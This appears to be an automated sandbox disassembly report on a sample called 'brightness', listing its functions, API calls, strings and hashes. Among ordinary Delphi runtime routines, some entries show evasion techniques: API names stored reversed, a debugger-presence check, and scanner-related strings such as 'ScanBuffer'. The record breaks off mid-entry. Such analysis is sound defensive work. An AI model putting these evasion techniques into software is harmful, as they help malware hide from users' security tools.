Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: c049081df2057766683513c52351a07541f6888db3e24447fec7c75bf311e282
Instruction ID: 2f6e1a407e52153d404a58d326a41c6f014b27d4a6da209bcd90a6d03254f99a
Opcode Fuzzy Hash: c049081df2057766683513c52351a07541f6888db3e24447fec7c75bf311e282
Instruction Fuzzy Hash: FC71D130E442D88FDF22BA2CCC84B98BAF5EB09711F1041E5D949AB282CB754985CF51

Function 0278BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0278C08B,?,?,00000000,00000000), ref: 0278BDF6

Part of subcall function 0278A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0278A7E2

Strings

m/d/yy, xrefs: 0278BEC5
AMPM , xrefs: 0278C019
mmmm d, yyyy, xrefs: 0278BEF2
:mm:ss, xrefs: 0278C046
:mm, xrefs: 0278C029
AMPM, xrefs: 0278C00A

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: f67745053a5082c5db0941947de151a079ce6068149308713b92aa1b0df8edaa
Instruction ID: 5a63ebe62e0d543731ea4d0f84ffd61d6b6dd6b3517707394a515593f7d86370
Opcode Fuzzy Hash: f67745053a5082c5db0941947de151a079ce6068149308713b92aa1b0df8edaa
Instruction Fuzzy Hash: 26617234B801499BDB07F7A4DC94B9F77B7EB88300F50943AE501DB744DA39D9069BA1

Function 0279AE98 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0279AEB8
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0279AECF
IsBadReadPtr.KERNEL32(?,00000004), ref: 0279AF63
IsBadReadPtr.KERNEL32(?,00000002), ref: 0279AF6F
IsBadReadPtr.KERNEL32(?,00000014), ref: 0279AF83

Strings

LoadLibraryExA, xrefs: 0279AEC5
KernelBase, xrefs: 0279AECA

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: d5563114e02545ce6418d217e22a5be5cc7a201697d1e689771fa78f530238b1
Instruction ID: c7cf94cc18aa42bd14657b2897f97304d790eac6f359d29c9b73a20f3dae38a8
Opcode Fuzzy Hash: d5563114e02545ce6418d217e22a5be5cc7a201697d1e689771fa78f530238b1
Instruction Fuzzy Hash: 753150B2A41305BFDF21DB68EC85F6A77A9AF06768F044150FA14EB2C1D370E950CBA1

Function 0278435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02784423,?,?,027DA7C8,?,?,027AE7A8,027865B1,027AD30D), ref: 02784395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02784423,?,?,027DA7C8,?,?,027AE7A8,027865B1,027AD30D), ref: 0278439B
GetStdHandle.KERNEL32(000000F5,027843E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02784423,?,?,027DA7C8), ref: 027843B0
WriteFile.KERNEL32(00000000,000000F5,027843E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02784423,?,?), ref: 027843B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027843D4

Strings

Runtime error at 00000000, xrefs: 0278438E, 027843CD
Error, xrefs: 027843C8

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 64599eaede6f07b6c8d30834bd72a6fe8925f31a9480162e8c00d34f573a3e22
Instruction ID: 40f769579aba8b1f4474738097f72e6629a528008f01f9392e0256b0433d0acf
Opcode Fuzzy Hash: 64599eaede6f07b6c8d30834bd72a6fe8925f31a9480162e8c00d34f573a3e22
Instruction Fuzzy Hash: 99F0B4A0EC534176FA11B260AC6AF6A2B6D4784F25F908B15B324A44C0C7F458C68B27

Function 0278AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0278AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0278AD59
Part of subcall function 0278AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0278AD7D
Part of subcall function 0278AD3C: GetModuleFileNameA.KERNEL32(02780000,?,00000105), ref: 0278AD98
Part of subcall function 0278AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0278AE2E

CharToOemA.USER32(?,?), ref: 0278AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0278AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0278AF1E
GetStdHandle.KERNEL32(000000F4,0278AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0278AF33
WriteFile.KERNEL32(00000000,000000F4,0278AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0278AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0278AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0278AF71

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 3c9a705ef1190ae438e918a2ddd825d1fdf88bc95aa8774fb9cdc020cc57a420
Instruction ID: 97f7ed04002d382cb37d72c3a4fe3a1c91b483b579753e7bbe6cbecb04c83632
Opcode Fuzzy Hash: 3c9a705ef1190ae438e918a2ddd825d1fdf88bc95aa8774fb9cdc020cc57a420
Instruction Fuzzy Hash: 23115EB25C42417AD302FBA4CC89F9B77FDAB45300F804A16B744D60E1EA75E9448B62

Function 0278E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0278E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0278E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0278E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0278E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0278E710
VariantCopy.OLEAUT32(?,00000000), ref: 0278E745

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: e9918fe29dd99adb36c3689a24940b879d814604dd226a620ff2c75ce92c80ff
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 1F510975A412299BCB22EB98CD84BD9B3FDAF49310F0045D5FA08E7211DB30AF818F61

Function 02783598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027835BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02783609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027835ED
RegCloseKey.ADVAPI32(?,02783610,00000000,?,00000004,00000000,02783609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02783603

Strings

FPUMaskValue, xrefs: 027835E4
SOFTWARE\Borland\Delphi\RTL, xrefs: 027835B0

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 4f81cc90cfa763f234292c86b9906357fbb523b51e9f91befba3542dc8252851
Instruction ID: 20e25ba9c3a674c8a88d88d47f87072902bd6c3564bd51928ffe804e36dd3925
Opcode Fuzzy Hash: 4f81cc90cfa763f234292c86b9906357fbb523b51e9f91befba3542dc8252851
Instruction Fuzzy Hash: 7301D8B5B80318BAFB11EFD8CD02BBE77ECE708B10F5045A1BA04D6680E674A510CB59

Function 02798140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
GetProcAddress.KERNEL32(?,?), ref: 027981A5

Strings

Kernel32, xrefs: 02798188
sserddAcorPteG, xrefs: 0279815B

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 9d476401fa285e5a4bf4a3428642f69d299ce265238de7609d0275dcee1c51a7
Instruction ID: 604969d2dc7d21110b65b761743d42bf44e0b0c1b2af24f1e487b420a6827678
Opcode Fuzzy Hash: 9d476401fa285e5a4bf4a3428642f69d299ce265238de7609d0275dcee1c51a7
Instruction Fuzzy Hash: 2A016DB5A80304BFEB01FBA4EC55F5EBBFEEB49B00F528464F400D7650EA70A9009E25

Function 0278AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0278AAE7,?,?,00000000), ref: 0278AA68

Part of subcall function 0278A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0278A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0278AAE7,?,?,00000000), ref: 0278AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 0278AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0278AAE7,?,?,00000000), ref: 0278AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 0278AACC

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 230660e7e6b247916d85aa8edd042a78842b86171336c45d779a24a85c58661b
Instruction ID: 59ab5fe302b0df27e67eab53efa2172853d3c3008dfae2fc0eb16c231a2bc248
Opcode Fuzzy Hash: 230660e7e6b247916d85aa8edd042a78842b86171336c45d779a24a85c58661b
Instruction Fuzzy Hash: C301F2B43C02847FF713BA64CD19F6A7B5DDB81720F510162E500A6AC0E675DE008A6A

Function 0278AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0278ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0278AB2F

Part of subcall function 0278A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0278A7E2

Strings

eeee, xrefs: 0278AC3E
ggg, xrefs: 0278AC15
yyyy, xrefs: 0278AC25

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 26fc54fd4896c53f2fb3ec92e5f89ceedb173d4f84ca6c987da8ab3a655e5bec
Instruction ID: 243fc78b274d9b89f4a614303e8101c9ceb378d02a413480603727e941da0bb9
Opcode Fuzzy Hash: 26fc54fd4896c53f2fb3ec92e5f89ceedb173d4f84ca6c987da8ab3a655e5bec
Instruction Fuzzy Hash: B94118B17C41064BD713FB7A88A86BEB7E7DF81300B554527D642D3344EAB8ED02CA65

Function 02798098 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Strings

AeldnaHeludoMteG, xrefs: 027980B1
KernelBASE, xrefs: 027980D1

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 1193dd008927a946c90729a47c7a2364f26a44d773613aacb916d4a004952101
Instruction ID: 84890c05b51bdd5fc4d40937024389d16b99ead7d1e29a60b32d105a65fa51ea
Opcode Fuzzy Hash: 1193dd008927a946c90729a47c7a2364f26a44d773613aacb916d4a004952101
Instruction Fuzzy Hash: 17F030B1684308AFEB02FFB5EC5695EBBBDFB4BB40B524465F400D3610E670AD109E65

Function 0279F9DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,0279FDE0,UacInitialize,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanString), ref: 0279F9E2
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0279F9F4

Strings

KernelBase, xrefs: 0279F9DD
IsDebuggerPresent, xrefs: 0279F9EE

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: a610341e7234a8884b8c072d0499dc1756271c6f41112a024dbdcf8f87045bf9
Instruction ID: f23ec5ae3bf5ffc7fec1b1c84e1cfcace95de2f52b031d0891d9d29021a03fbc
Opcode Fuzzy Hash: a610341e7234a8884b8c072d0499dc1756271c6f41112a024dbdcf8f87045bf9
Instruction Fuzzy Hash: 61D012F23A03C02EBE00B6F43CC881D038CC91B92E3280E60F022D24B2F6AA8811501A

Function 0278C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,027AD10B,00000000,027AD11E), ref: 0278C47A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0278C48B

Strings

GetDiskFreeSpaceExA, xrefs: 0278C485
kernel32.dll, xrefs: 0278C475

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: a20d1d7eeeb3e1e999a088b2f7031fd36016511942ebe97dc1e3b2de2ab03bc0
Instruction ID: 5dde05b1cb3f5a359089b93426cb2cffdb4a053bbab9baa472c7684dc37d9f6c
Opcode Fuzzy Hash: a20d1d7eeeb3e1e999a088b2f7031fd36016511942ebe97dc1e3b2de2ab03bc0
Instruction Fuzzy Hash: 5ED05EE0AC03446FE606BBB254896312E988748320B14987EE40545100E77254908F24

Function 0278E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0278E297
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0278E2B3
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0278E32A
VariantClear.OLEAUT32(?), ref: 0278E353

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 2c6574165253c8a60fc4643d2461370dba0e359cb455618f6e97c90563326cf3
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 7A413975A416299FCB62EB98CD94BCAB3BDAF49314F0045D5F608E7211DB30AF808F61

Function 0278AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0278AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0278AD7D
GetModuleFileNameA.KERNEL32(02780000,?,00000105), ref: 0278AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0278AE2E

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 15c4d62fd8ecdf35bdd1af39ffd2f8956434f1bb59c3bf20902f4664e4c844cc
Instruction ID: e8c8f34b66cb99bf031e838b08aa1d8906d5e78236689db2ec07f8fb2d3af1e9
Opcode Fuzzy Hash: 15c4d62fd8ecdf35bdd1af39ffd2f8956434f1bb59c3bf20902f4664e4c844cc
Instruction Fuzzy Hash: 39412E71A802589FDB22EB68CC88BDAB7FDAB48300F4445E6E548E7341D7749F848F51

Function 0278AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0278AD59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0278AD7D
GetModuleFileNameA.KERNEL32(02780000,?,00000105), ref: 0278AD98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0278AE2E

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 8b758fc91a51b68ac430b07f180cdb85fe9f086d0dbbfabe1ff692d263a8c5db
Instruction ID: 93f5ab5f53d1b5cfa103a55dabda134fa526d1f57fef4047a4fff60bb85a4c8c
Opcode Fuzzy Hash: 8b758fc91a51b68ac430b07f180cdb85fe9f086d0dbbfabe1ff692d263a8c5db
Instruction Fuzzy Hash: 82413071A802589FDB22EB68CC88BDAB7FDAB48301F4445E6E548E7341D7749F848F51

Function 02781C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
